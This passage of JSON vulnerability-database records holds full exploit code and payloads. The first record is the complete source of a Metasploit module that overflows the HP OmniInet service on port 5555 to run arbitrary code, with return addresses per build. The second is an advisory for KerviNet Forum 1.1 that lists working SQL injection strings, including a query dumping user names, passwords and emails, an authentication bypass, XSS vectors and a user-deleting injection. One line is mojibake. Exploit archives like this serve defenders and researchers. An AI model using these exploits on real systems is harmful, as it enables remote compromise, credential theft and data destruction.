However, this module only exploits the first one.\n", "modified": "2017-07-24T13:26:21", "published": "2010-01-06T20:04:58", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_1", "href": "", "type": "metasploit", "title": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). 
However, this module only\n exploits the first one.\n },\n 'Author' =>\n [\n 'EgiX <n0b0d13s[at]gmail.com>',\n 'Fairuzan Roslan <riaf[at]mysec.org>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2007-2280' ],\n [ 'BID', '37396' ],\n [ 'OSVDB', '61206' ],\n [ 'ZDI', '09-099' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 4658+66,\n 'BadChars' => \"\\x00\", # (we don't want \\x00\\x00)\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic Targeting', { 'auto' => true } ],\n\n # DP Targets\n [ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330',\n {\n 'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0)\n }\n ],\n [ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331',\n {\n 'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0)\n }\n ],\n\n # APPRM Targets\n [ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81',\n {\n 'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0)\n }\n ],\n [ 'HP Application Recovery Manager software A.06.10: INET, internal build 282',\n {\n 'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0)\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 17 2009'))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def check\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if (resp)\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n # extract version\n if (resp =~ /HP Data Protector/)\n version = resp.split[3]\n elsif (resp =~ /HP OpenView Storage Data Protector/)\n version = resp.split[5]\n elsif (resp =~ /HP StorageWorks Application Recovery Manager/)\n version = resp.split[5]\n else\n return Exploit::CheckCode::Detected\n end\n\n version = version.split('.')\n major = version[1].to_i\n minor = version[2].to_i\n if ((major < 6) or (major == 6 and minor < 11))\n return 
Exploit::CheckCode::Appears\n end\n\n if ((major > 6) or (major == 6 and minor >= 11))\n return Exploit::CheckCode::Safe\n end\n\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n mytarget = target\n\n if (target['auto'])\n mytarget = nil\n\n print_status(\"Automatically detecting the target...\")\n\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if not resp\n fail_with(Failure::Unknown, \"No version response returned.\")\n end\n\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n self.targets.each do |t|\n if (resp =~ /#{t.name}/) then\n mytarget = t\n break\n end\n end\n\n if (not mytarget)\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n else\n print_status(\"Trying target #{mytarget.name}...\")\n end\n\n # separator between arguments\n sep = [0x2000].pack('N')\n\n # Unicode BOM\n pkt = \"\\xff\\xfe\"\n # MSG_PROTOCOL command\n pkt << Rex::Text.to_unicode(\"267\")\n\n # dunno\n 3.times do\n pkt << sep\n pkt << rand_text_alpha_upper(2)\n end\n\n # culprit string\n pkt << sep\n\n # the payload + seh record\n pkt << payload.encoded\n pkt << generate_seh_record(mytarget.ret)\n\n # jump back\n dist = payload_space + 8\n pkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + dist.to_s).encode_string\n\n # force exception hitting the end of the stack\n pkt << rand_text_alphanumeric(1000) * 25\n\n # 5th arg\n pkt << sep\n pkt << rand_text_alpha_upper(2)\n\n # end marker\n pkt << sep\n\n # packet length\n buff = [pkt.length].pack('N')\n buff << pkt\n\n connect\n print_status(\"Sending MSG_PROTOCOL packet...\")\n sock.put(buff)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_1.rb"}], "zdt": [{"lastseen": "2018-01-01T13:01:27", 
"bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-07-01T00:00:00", "published": "2009-07-01T00:00:00", "id": "1337DAY-ID-5448", "href": "https://0day.today/exploit/description/5448", "type": "zdt", "title": "KerviNet Forum <= 1.1 Multiple Remote Vulnerabilities", "sourceData": "=====================================================\r\nKerviNet Forum <= 1.1 Multiple Remote Vulnerabilities\r\n=====================================================\r\n\r\n\r\ndork: \"Copyright KerviNet\"\r\neLwaux(c) 20.06.2009\r\n\r\n## ## ## ##\r\nBlind SQLinj\r\n/index.php\r\n-------------------------------------------------------------------------------------------------\r\nif($_COOKIE['user_enter']==\"auto\") {\r\n$enter_login=$_COOKIE['enter_login'];\r\n$enter_parol=$_COOKIE['enter_parol'];\r\n$mysql->query(\"SELECT name, pass, status FROM users WHERE name =\r\n'\".$enter_login.\"' AND pass = '\".$enter_parol.\"'\");\r\n-------------------------------------------------------------------------------------------------\r\nexploit:\r\n COOKIE: user_enter=auto\r\n COOKIE: enter_login = abc\r\n COOKIE: enter_parol = ' or name = (select name from users where\r\nid_user=1) and '1'='1';\r\n sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc'\r\nAND pass = '' or name = (select name from users where id_user<10 limit\r\n1)\r\n\u00d0\u00b8 \u00d0\u00b2\u00d1\u2039 \u00d0\u00b0\u00d0\u00b2\u00d1\u201a\u00d0\u00be\u00d0\u00bc\u00d0\u00b0\u00d1\u201a\u00d0\u00be\u00d0\u00bc \u00d0\u00b7\u00d0\u00b0\u00d0\u00b9\u00d0\u00b4\u00d0\u00b5\u00d1\u201a\u00d0\u00b5 \u00d0\u00bf\u00d0\u00be\u00d0\u00b4 \u00d0\u00b0\u00d0\u00b4\u00d0\u00bc\u00d0\u00b8\u00d0\u00bd\u00d0\u00be\u00d0\u00bc, \u00d0\u00b4\u00d0\u00b0\u00d0\u00b6\u00d0\u00b5 \u00d0\u00bd\u00d0\u00b5 \u00d0\u00b7\u00d0\u00bd\u00d0\u00b0\u00d1\u008f \u00d0\u00b5\u00d0\u00b3\u00d0\u00be \u00d0\u00b8\u00d0\u00bc\u00d0\u00b5\u00d0\u00bd\u00d0\u00b8 
(:\r\n\r\n\r\n\r\n## ## ## ##\r\nSQLinj\r\n/message.php\r\n-------------------------------------------------------------------------------------------------\r\n9: $topic=$_GET['topic'];\r\n18: if($topic) {\r\n69: $mysql->query(\"SELECT name, viewing, voting, status, top_status,\r\nid_forum FROM topics WHERE id_topic = \".$topic);\r\nexploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users\r\n-------------------------------------------------------------------------------------------------\r\n\r\n\r\n## ## ## ##\r\nSiXSS\r\n/message.php\r\nexploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users\r\n\r\n\r\n## ## ## ##\r\naXSS\r\n/add_voting.php\r\n-------------------------------------------------------------------------------------------------\r\n22: $topic=$_GET['topic'];\r\n61: if($topic) {\r\n66: \t $forum_edit->add_voting($time, $topic, $v_vopros, $variants);\r\n74: }\r\n\r\nfunction add_voting($time, $topic, $v_vopros, $variants) {\r\nglobal $user;\r\nglobal $user_ip;\r\nif($user) {\r\nglobal $mysql;\r\n$mysql->query(\"UPDATE topics SET voting = 1 WHERE id_topic = \".$topic);\r\n$mysql->query(\"INSERT INTO v_name VALUES (0, '\".$v_vopros.\"', \".$topic.\")\");\r\n$id_vname=mysql_insert_id();\r\nfor($i=0; $i<count($variants); $i+=1) {\r\n$vr_nom=$i+1;\r\n$mysql->query(\"INSERT INTO v_variants VALUES (\".$vr_nom.\",\r\n'\".$variants[$i].\"', \".$id_vname.\")\");\r\n}\r\n}\r\nreturn $id_vname;\r\n}\r\n-------------------------------------------------------------------------------------------------\r\n\r\nexploit:/add_voting.php?topic=1\r\n POST: add_voting = ok_add\r\n POST: v_vopros = v\r\n POST: v_variant1 = {XSS}\r\n POST: v_variant2 = v2\r\n\r\n\r\n## ## ## ##\r\nusers deleating\r\n/admin/edit_user.php\r\n-------------------------------------------------------------------------------------------------\r\n$del_user_id=$_POST['del_user_id'];\r\n$mysql->query(\"DELETE FROM users WHERE id_user = 
\".$del_user_id);\r\n-------------------------------------------------------------------------------------------------\r\nexploit:\r\n POST: del_user_id=(select user_id from users limit 1)\r\n\r\n\r\n## ## ## ##\r\nPath Disclosure\r\n-------------------------------------------------------------------------------------------------\r\n/include_files/voting_diagram.php\r\n/include_files/voting.php\r\n/include_files/topics_search.php\r\n/include_files/topics_list.php\r\n/include_files/top_part.php\r\n/include_files/quick_search.php\r\n/include_files/quick_reply.php\r\n/include_files/moder_menu.php\r\n/include_files/messages_list.php\r\n/include_files/menu.php\r\n/include_files/head.php\r\n/include_files/forums_list.php\r\n/include_files/forum_statistics.php\r\n/include_files/forum_info.php\r\n/include_files/birthday.php\r\n/admin/head.php\r\n-------------------------------------------------------------------------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5448"}]}